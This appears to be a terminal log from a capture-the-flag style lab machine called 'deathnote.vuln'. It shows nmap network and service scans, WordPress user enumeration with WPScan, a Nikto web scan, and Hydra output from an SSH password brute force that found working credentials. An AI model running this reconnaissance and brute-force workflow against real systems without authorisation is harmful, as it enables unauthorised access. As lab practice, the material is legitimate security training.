Starting Nmap 7.92( https://nmap.org ) at 2022-04-05 14:35 CST
Nmap scan report for192.168.0.1
Host is up (0.00050s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for192.168.0.100
Host is up (0.20s latency).
MAC Address: 94:E2:3C:A7:02:C9 (Intel Corporate)
Nmap scan report for192.168.0.103
Host is up (0.16s latency).
MAC Address: 52:43:BB:A1:BF:A7 (Unknown)
Nmap scan report for192.168.0.105
Host is up (0.18s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for earth.local (192.168.0.108)
Host is up (0.18s latency).
MAC Address: 50:01:D9:DA:FA:DD (Huawei Technologies)
Nmap scan report for192.168.0.109
Host is up (0.0010s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for192.168.0.111
Host is up (0.00047s latency).
MAC Address: 08:00:27:B6:FA:40 (Oracle VirtualBox virtual NIC)
Nmap scan report for192.168.0.104
Host is up.
Nmap done: 256 IP addresses (8 hosts up) scanned in6.72 seconds
$ sudo nmap -sV -sC -A 192.168.0.111
Starting Nmap 7.92( https://nmap.org ) at 2022-04-05 14:35 CST
Nmap scan report for192.168.0.111
Host is up (0.00052s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)| ssh-hostkey:
|2048 5e:b8:ff:2d:ac:c7:e9:3c:99:2f:3b:fc:da:5c:a3:53 (RSA)|256 a8:f3:81:9d:0a:dc:16:9a:49:ee:bc:24:e4:65:5c:a6 (ECDSA)|_ 256 4f:20:c3:2d:19:75:5b:e8:1f:32:01:75:c2:70:9a:7e (ED25519)53/tcp filtered domain
80/tcp open http Apache httpd 2.4.38 ((Debian))|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:B6:FA:40 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
10.52 ms 192.168.0.111
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1host up) scanned in9.63 seconds
$ wpscan --url http://192.168.0.111/wordpress -e u
_______________________________________________________________
__ _______ _____
\\ / / __ \ / ____|\\ /\ / /||__)|(___ ___ __ _ _ __ ®
\\/ \/ / | ___/ \___ \ / __|/ _` |'_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.0.111/wordpress/ [192.168.0.111]
[+] Started: Tue Apr 5 15:12:26 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.0.111/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.0.111/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.0.111/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.0.111/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.8 identified (Insecure, released on 2021-07-20).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.0.111/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.8'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.0.111/wordpress/, Match: 'WordPress 5.8'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================================================================================================================================================================================================================>(10 / 10)100.00% Time: 00:00:00
[i] User(s) Identified:
[+] kira
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Apr 515:12:27 2022[+] Requests Done: 48[+] Cached Requests: 4[+] Data Sent: 12.469 KB
[+] Data Received: 136.091 KB
[+] Memory used: 151.547 MB
[+] Elapsed time: 00:00:00
$ nikto -host http://deathnote.vuln/wordpress
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.0.111
+ Target Hostname: deathnote.vuln
+ Target Port: 80
+ Start Time: 2022-04-05 15:13:34 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://deathnote.vuln/wordpress/index.php/wp-json/>;rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /wordpress/license.txt: License file found may identify site software.
+ /wordpress/: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wordpress/wp-content/uploads/: Directory indexing found.
+ /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wordpress/wp-login.php: Wordpress login found
+ 7785 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2022-04-05 15:14:16 (GMT8)(42 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Hydra v9.3 (c)2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-05 16:02:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4[DATA] max 16 tasks per 1 server, overall 16 tasks, 43 login tries (l:1/p:43), ~3 tries per task
[DATA] attacking ssh://192.168.0.111:22/
[22][ssh] host: 192.168.0.111 login: l password: death4me
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR]3 targets did not resolve or could not be connected
[ERROR]0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-05 16:02:16